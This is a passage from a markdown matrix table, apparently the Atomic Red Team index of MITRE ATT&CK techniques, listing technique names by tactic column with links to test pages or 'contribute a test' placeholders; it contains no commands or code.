Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | +| | [Python](../../T1059.006/T1059.006.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Scheduled Task](../../T1053.005/T1053.005.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | +| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Unix Shell](../../T1059.004/T1059.004.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Remote Access Software](../../T1219/T1219.md) | | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Standard Encoding](../../T1132.001/T1132.001.md) | | +| | [Visual Basic](../../T1059.005/T1059.005.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Time Discovery](../../T1124/T1124.md) | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Emond](../../T1546.014/T1546.014.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Windows Management Instrumentation](../../T1047/T1047.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | | | +| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | | +| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Launch Agent](../../T1543.001/T1543.001.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Launchd](../../T1053.004/T1053.004.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [File Deletion](../../T1070.004/T1070.004.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Local Accounts](../../T1078.003/T1078.003.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | | +| | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | | +| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | | +| | | [Office Application Startup](../../T1137/T1137.md) | [Port Monitors](../../T1547.010/T1547.010.md) | [Hide Artifacts](../../T1564/T1564.md) | | | | | | | | +| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | | +| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | | +| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Password Filter DLL](../../T1556.002/T1556.002.md) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | +| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | +| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | +| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | +| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | +| | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | +| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Pre-OS Boot 